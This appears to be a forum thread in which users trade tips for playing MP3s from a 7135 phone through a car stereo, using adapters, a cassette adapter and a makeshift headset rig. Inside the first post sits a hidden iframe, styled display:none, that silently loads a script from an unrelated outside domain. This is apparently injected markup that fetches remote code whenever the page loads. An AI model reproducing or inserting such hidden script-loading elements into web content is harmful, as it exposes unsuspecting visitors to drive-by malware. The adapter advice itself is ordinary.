    car stereo aux input?

Has anyone had any success finding a connector cable (or creating one) to connect the 7135 to their car stereo to play MP3s throught the stereo while in the car?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Buy the 2.5 mm to 1/8" adapter that user "coolcat" on here is selling. Then plug that into a cassette adapter, and there you go.

I highly recommend the combo adapter, so you can have a headset plugged in at the same time. Don't want to be messing with plugs while driving!

    heh heh

thanks for the "plugs" yourself, coolcat! i'm a little pissed off that i needed to buy an adapter for this very basic usage but i'm happy that you've been able to create a niche for yourself - right on!

Ah what we did was take a tape adapter and and head set and migrated them together.. So now when you listen to the MP3s and get a call you can talk using the mic on the head set and the car speakers amplify the other person... Works good unless you are in a t tops or convertable.. lol

Problem with that method is the microphone will pick up the amplified other person, and echo their own voice back to them. It can be quite maddening.
